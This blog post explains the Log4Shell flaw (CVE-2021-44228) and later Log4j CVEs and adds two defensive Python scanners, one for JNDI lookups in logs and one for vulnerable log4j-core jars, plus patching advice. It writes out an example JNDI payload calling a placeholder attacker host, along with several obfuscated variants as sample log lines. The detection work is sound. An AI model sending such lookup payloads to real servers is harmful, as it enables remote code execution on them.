
Log4Shell is much worse than you think. If you haven't been living under a rock for the past month, you have probably heard of Log4j and the vulnerabilities that have surfaced in it.
What is Log4j?
Apache Log4j 2 is a free and open-source logging library. Developers use it to record log messages from the code they write, and it is one of the most widely used logging libraries in the Java ecosystem. Libraries like Log4j let programmers reuse common components across their systems instead of writing their own.
Isn’t that what open source software is all about? It allows you to modify it to match your specific needs! That is, until the recent discovery of “Log4Shell,” a zero-day vulnerability involving arbitrary code execution (CVE-2021-44228, rated ‘critical’).
Simply put, this flaw lets an attacker run arbitrary code on the affected machine remotely (over a network, such as the Internet). The trigger is Log4j's lookup feature: if a string the attacker controls, such as an HTTP User-Agent header or a username, ends up in a logged message and contains a lookup of the form ${jndi:ldap://attacker-host/x} (attacker-host being whatever server they run), a vulnerable version resolves it, contacts that server over JNDI and loads what it returns.
It’s bad
This vulnerability is extremely critical because it grants complete control of a machine running an unpatched version of Log4j, with whatever privileges the logging application has. That opens the door to data theft, malware deployment and other malicious activity.
It has been called "the single biggest, most critical vulnerability of the last decade", and it carries the maximum CVSS score of 10.0 out of 10.
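What a detection engineer wants at this point is a way to recognise these lookups in logs, including the obfuscated forms attackers use to dodge naive matching on the literal string "jndi". The Python below is an added example, not code from the original post: it reduces nested Log4j lookups the way the vulnerable library would (a simplified evaluator covering the lower, upper, env and default-value forms, which is an approximation of Log4j's behaviour rather than the library itself) and then reports any JNDI lookup that survives. The access-log lines, IP addresses and URLs are constructed for the example.

```python
import re

# Innermost lookup: "${...}" whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way obfuscated payloads rely on.

    Simplified model of Log4j's lookups (an approximation, not the library):
      jndi:...        kept as-is, this is the signal we are hunting for
      anything:-X     -> X   (unset variable or empty prefix falls back to
                              default X; covers ${::-j} and ${env:NaN:-j})
      lower:X         -> x
      upper:X         -> X
      anything else   -> ""  (e.g. ${date:yyyy}; resolving to empty keeps
                              the reduction finite)
    """
    if body.lower().startswith("jndi:"):
        return "${" + body + "}"
    if ":-" in body:
        return body.split(":-", 1)[1]
    if ":" in body:
        name, arg = body.split(":", 1)
        name = name.lower()
        if name == "lower":
            return arg.lower()
        if name == "upper":
            return arg.upper()
    return ""


def normalize(text: str, max_rounds: int = 50) -> str:
    """Repeatedly reduce innermost lookups until only JNDI lookups remain."""
    for _ in range(max_rounds):
        reduced = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if reduced == text:
            break
        text = reduced
    return text


def find_jndi(line: str) -> list:
    """Return every de-obfuscated ${jndi:...} lookup found in one log line."""
    norm = normalize(line)
    return [m.group(0) for m in _INNER.finditer(norm)
            if m.group(1).lower().startswith("jndi:")]


def scan(lines) -> list:
    """Return (line_index, [jndi lookups]) for every line that carries one."""
    hits = []
    for i, line in enumerate(lines):
        found = find_jndi(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed access-log lines (not real traffic); 203.0.113.7 is a
# documentation address. Lines 1-4 are probes, 0 and 5 are benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /?x=${${lower:j}ndi:${lower:rmi}://203.0.113.7:1099/obj} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.7/x}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap://203.0.113.7/y}"',
    '10.0.0.3 - - [10/Dec/2021:14:02:21 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 10 "-" "-"',
]

if __name__ == "__main__":
    for i, found in scan(SAMPLE_LOG):
        print(f"line {i}: {found}")
```

Run it against a real access log by feeding `scan()` the file's lines; the reduction loop is bounded so a crafted line with thousands of nested lookups cannot hang the scanner, and a benign lookup such as ${date:yyyy} produces no hit.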
Another CVE appears
CVE-2021-44228 has been patched, thankfully (Log4j 2.15.0), although that first fix was incomplete and led to CVE-2021-45046 and the 2.16.0 release. Then CVE-2021-45105 appeared. This one is a denial-of-service (DoS) issue: when the logging layout uses a context lookup and an attacker controls the Thread Context Map data it refers to, a self-referential lookup sends the evaluation into uncontrolled recursion until the thread dies with a stack overflow. Not as bad as a remote shell, but it can badly cripple an organization's systems. Upgrading to Log4j 2.17.0 fixes CVE-2021-45105.
What can we do now?
Start searching for applications that use Log4j and patch them immediately! Look inside the artifacts you actually deploy, not just your declared dependencies: log4j-core is often pulled in transitively and bundled inside fat JARs, WARs and container images.
Keep everything up to date. Having a slightly outdated version of Log4j can be serious: 2.15.0 and 2.16.0 each closed one hole and left another, so the target today is 2.17.0 (or Apache's matching backport for older Java runtimes).
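The search step above is easier with a scanner that looks inside archives rather than trusting file names. The Python below is an added example, not the post's own tooling: it walks a directory, opens every JAR/WAR/EAR (recursing into archives bundled inside archives), reads log4j-core's version from its Maven pom.properties, checks whether JndiLookup.class is still present, and flags versions below the fixed releases (2.17.0 for Java 8+, 2.12.3 for Java 7, 2.3.1 for Java 6). The demo tree it builds in a temporary directory, with its fake jars, placeholder class bytes and names such as app.war, is constructed for the example.

```python
import io
import os
import re
import sys
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(v: str) -> tuple:
    """'2.14.1' -> (2, 14, 1); missing components are padded with 0."""
    nums = [int(x) for x in re.findall(r"\d+", v)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def needs_upgrade(v: tuple) -> bool:
    """True if a log4j-core version predates the release that closes
    CVE-2021-44228 / 45046 / 45105 on its branch (Apache's fixed lines)."""
    if v[0] != 2:
        return False          # 1.x is not affected by these CVEs (it is EOL regardless)
    if v[1] >= 13:
        return v < (2, 17, 0)  # Java 8+ line
    if v[1] == 12:
        return v < (2, 12, 3)  # Java 7 backport line
    if v[1] <= 3:
        return v < (2, 3, 1)   # Java 6 backport line
    return True                # 2.4 .. 2.11: no fixed release on that line


def inspect_archive(zf: zipfile.ZipFile, where: str, findings: list) -> None:
    """Record a finding if this archive is log4j-core, then recurse into
    any archives it bundles (fat JARs, WARs, EARs)."""
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        version = m.group(1).strip() if m else "unknown"
        findings.append({
            "path": where,
            "version": version,
            "jndi_lookup_present": JNDI_CLASS in names,
            "vulnerable": version == "unknown" or needs_upgrade(parse_version(version)),
        })
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(inner, f"{where}!/{name}", findings)


def scan_tree(root: str) -> list:
    """Walk a directory and inspect every archive found under it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if not f.lower().endswith(ARCHIVE_EXT):
                continue
            path = os.path.join(dirpath, f)
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path, findings)
            except zipfile.BadZipFile:
                continue
    return findings


def _make_log4j_jar(version: str, with_jndi: bool = True) -> bytes:
    """Constructed stand-in for log4j-core: only the files the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
    return buf.getvalue()


def build_demo_tree(root: str) -> None:
    """Constructed layout: a patched jar, a vulnerable jar nested in a WAR,
    and a vulnerable jar with JndiLookup.class stripped (assumed names)."""
    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    with open(os.path.join(root, "lib", "log4j-core-2.17.0.jar"), "wb") as f:
        f.write(_make_log4j_jar("2.17.0"))
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", _make_log4j_jar("2.14.1"))
    with open(os.path.join(root, "app.war"), "wb") as f:
        f.write(war.getvalue())
    with open(os.path.join(root, "lib", "log4j-core-2.14.1-stripped.jar"), "wb") as f:
        f.write(_make_log4j_jar("2.14.1", with_jndi=False))


def demo_scan() -> list:
    """Build the constructed tree in a temp dir and scan it."""
    root = tempfile.mkdtemp(prefix="log4j-demo-")
    build_demo_tree(root)
    return scan_tree(root)


if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo_scan()
    for r in results:
        status = "NEEDS UPGRADE" if r["vulnerable"] else "ok"
        print(f'{status:14} {r["version"]:8} jndi={r["jndi_lookup_present"]}  {r["path"]}')
```

Point it at a deployment directory (`python scan.py /opt/apps`) to get one line per embedded log4j-core. A jar whose JndiLookup.class has been removed is still reported by version, because class removal mitigates CVE-2021-44228 but not the recursion bug in CVE-2021-45105.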
A hackathon is born
Some awesome members of the cyberstorm.mu team and I decided to organize a hackathon over the weekend to help fix the Log4j vulnerabilities that reside in some open source projects.
While I have seen some maintainers put in the effort to fix the issues, some don't realize that their project is vulnerable. Even some companies aren't aware of this, even though there have been tons of articles online :/
We’re still hunting for open-source projects that need Log4j patches 🙂
Some interesting links:
- Log4j – Apache Log4j Security Vulnerabilities | Apache
- Log4Shell Update: Severity Upgraded 3.7 -> 9.0 for Second log4j Vulnerability (CVE-2021-45046) | LunaSec
- NCSC-NL/log4shell
Credits to LunaSec for featured image.